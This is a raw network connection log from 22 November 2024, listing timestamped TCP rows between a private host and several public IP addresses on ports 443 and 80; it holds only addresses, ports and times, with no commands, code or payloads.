Nov 22, 2024 20:35:13.665220976 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.674633980 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.683514118 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.683568954 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.683579922 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.692285061 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.692327976 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.692353010 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.692363024 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.692405939 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.693669081 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.702411890 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.702467918 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.702475071 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.716000080 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.716056108 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.716063976 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.719460964 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.719516039 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.719523907 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.741681099 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.741736889 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.741745949 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.742584944 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.742640972 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.742649078 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.754966974 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.755039930 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.755052090 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.759135962 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.759191990 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.759201050 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.762578011 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.762625933 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.762634039 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.766828060 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.766881943 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.766890049 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.769880056 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.769934893 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.769942999 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.772306919 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.772356987 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.772365093 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.774369955 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.774421930 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.774436951 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.774611950 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:13.774693966 CET	443	49736	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:13.774755955 CET	49736	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:14.626085043 CET	49745	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:14.626118898 CET	443	49745	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:14.626183033 CET	49745	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:14.626604080 CET	49745	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:14.626616955 CET	443	49745	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:14.740705013 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:14.740756989 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:14.740967989 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:14.742732048 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:14.742753983 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:15.103682995 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:15.103776932 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:15.103854895 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:15.105108023 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:15.105144978 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:16.183449030 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:16.183460951 CET	49730	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:16.305794001 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:16.305811882 CET	80	49730	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:16.305915117 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:16.306127071 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:16.414994001 CET	443	49745	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:16.415323019 CET	49745	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:16.415349960 CET	443	49745	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:16.415822983 CET	443	49745	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:16.418803930 CET	49745	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:16.418934107 CET	443	49745	142.250.181.100	192.168.2.4
Nov 22, 2024 20:35:16.425664902 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:16.463325024 CET	49745	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:16.549628973 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:16.549848080 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:16.553451061 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:16.553482056 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:16.553770065 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:16.569072008 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:16.569267988 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:16.575269938 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:16.575283051 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:16.575752020 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:16.604861021 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:16.610583067 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:16.623625994 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:16.651374102 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:17.073729038 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:17.073802948 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:17.073920965 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:17.074259043 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:17.074296951 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:17.074350119 CET	49747	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:17.074366093 CET	443	49747	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:17.114644051 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:17.114727974 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:17.114933968 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:17.115236998 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:17.115268946 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:17.473404884 CET	49754	443	192.168.2.4	172.217.17.78
Nov 22, 2024 20:35:17.473449945 CET	443	49754	172.217.17.78	192.168.2.4
Nov 22, 2024 20:35:17.473509073 CET	49754	443	192.168.2.4	172.217.17.78
Nov 22, 2024 20:35:17.473670959 CET	49754	443	192.168.2.4	172.217.17.78
Nov 22, 2024 20:35:17.473685026 CET	443	49754	172.217.17.78	192.168.2.4
Nov 22, 2024 20:35:18.164558887 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:18.164618015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:18.294018984 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:18.321630955 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:18.321726084 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:18.339334011 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.348490953 CET	49745	443	192.168.2.4	142.250.181.100
Nov 22, 2024 20:35:18.348647118 CET	49754	443	192.168.2.4	172.217.17.78
Nov 22, 2024 20:35:18.441190004 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:18.441263914 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:18.441272974 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:18.461617947 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:18.461680889 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:18.463134050 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:18.463141918 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:18.463392019 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:18.464725971 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:18.511326075 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:18.896822929 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.896847010 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.896853924 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.896866083 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.896895885 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.896970987 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:18.896997929 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.897016048 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:18.897038937 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:18.917350054 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.917459965 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:18.917486906 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:18.917512894 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:18.970628023 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:18.970709085 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:18.970890045 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:19.091268063 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:19.091294050 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:19.091306925 CET	49752	443	192.168.2.4	2.18.84.141
Nov 22, 2024 20:35:19.091319084 CET	443	49752	2.18.84.141	192.168.2.4
Nov 22, 2024 20:35:19.273044109 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:19.273099899 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:19.304019928 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:19.423676014 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:19.581598043 CET	49723	80	192.168.2.4	2.20.68.142
Nov 22, 2024 20:35:19.705513954 CET	80	49723	2.20.68.142	192.168.2.4
Nov 22, 2024 20:35:19.705581903 CET	49723	80	192.168.2.4	2.20.68.142
Nov 22, 2024 20:35:20.247627020 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:20.247699976 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:20.450530052 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:20.450531006 CET	49746	443	192.168.2.4	4.175.87.197
Nov 22, 2024 20:35:20.450604916 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:20.450639009 CET	443	49746	4.175.87.197	192.168.2.4
Nov 22, 2024 20:35:20.625762939 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:20.747842073 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:21.571528912 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:21.572381973 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:21.893815041 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.014170885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.342279911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.342310905 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.342322111 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.342339993 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.342371941 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.342381954 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.342382908 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.342394114 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.342405081 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.342417002 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.342432976 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.350220919 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.350277901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.350312948 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.350531101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.358587980 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.358644962 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.358675003 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.358714104 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.366966963 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.367028952 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.475080013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.475111008 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.475142002 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.475172043 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.534468889 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.534573078 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.534641981 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.538623095 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.538747072 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.538805962 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.547064066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.548628092 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.550023079 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.550084114 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.550123930 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.550179005 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.558465958 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.558641911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.558703899 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.566857100 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.566919088 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.566978931 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.575268030 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.575393915 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.575448036 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.583580017 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.583713055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.583880901 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.592077971 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.592148066 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.592210054 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.600363016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.600519896 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.600581884 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.608738899 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.608797073 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.608831882 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.608879089 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.617124081 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.617198944 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.617270947 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.666953087 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.667047977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.667166948 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.671106100 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.672439098 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.726217031 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.726310015 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.726392984 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.726437092 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.730146885 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.730292082 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.730359077 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.737930059 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.738076925 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.738145113 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.745361090 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.745451927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.745521069 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.753151894 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.753273964 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.753343105 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.760572910 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.760704041 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.760762930 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.764867067 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.764919996 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.764991045 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.765044928 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.769124985 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.769243956 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.769288063 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.773418903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.773545980 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.773601055 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.777791977 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.777978897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.778033018 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.782114029 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.782188892 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.782228947 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.782272100 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.786475897 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.786588907 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.786633968 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.790805101 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.790868998 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.790923119 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.795094013 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.795217991 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.795275927 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.799406052 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.799546957 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.799608946 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.803690910 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.803797007 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.803845882 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.808049917 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.808146000 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.808183908 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.808260918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.812241077 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.812268019 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.812298059 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.812319994 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.816517115 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.816582918 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.816642046 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.816680908 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.820741892 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.820792913 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.820833921 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.820873976 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.825004101 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.825047016 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.825052977 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.825082064 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.829262018 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.829309940 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.829359055 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.829401970 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.833460093 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.833507061 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.865123034 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.865196943 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.865196943 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.865241051 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.867249966 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.867302895 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.867384911 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.867434025 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.871503115 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.871552944 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.918450117 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.918476105 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.918545961 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.920432091 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.920543909 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.920543909 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.920622110 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.924467087 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.924520016 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.924577951 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.924618006 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.928474903 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.928555965 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.928597927 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.928656101 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.931436062 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.931485891 CET	80	49750	185.215.113.206	192.168.2.4
Nov 22, 2024 20:35:22.931518078 CET	49750	80	192.168.2.4	185.215.113.206
Nov 22, 2024 20:35:22.931554079 CET	49750	80	192.168.2.4	185.215.113.206
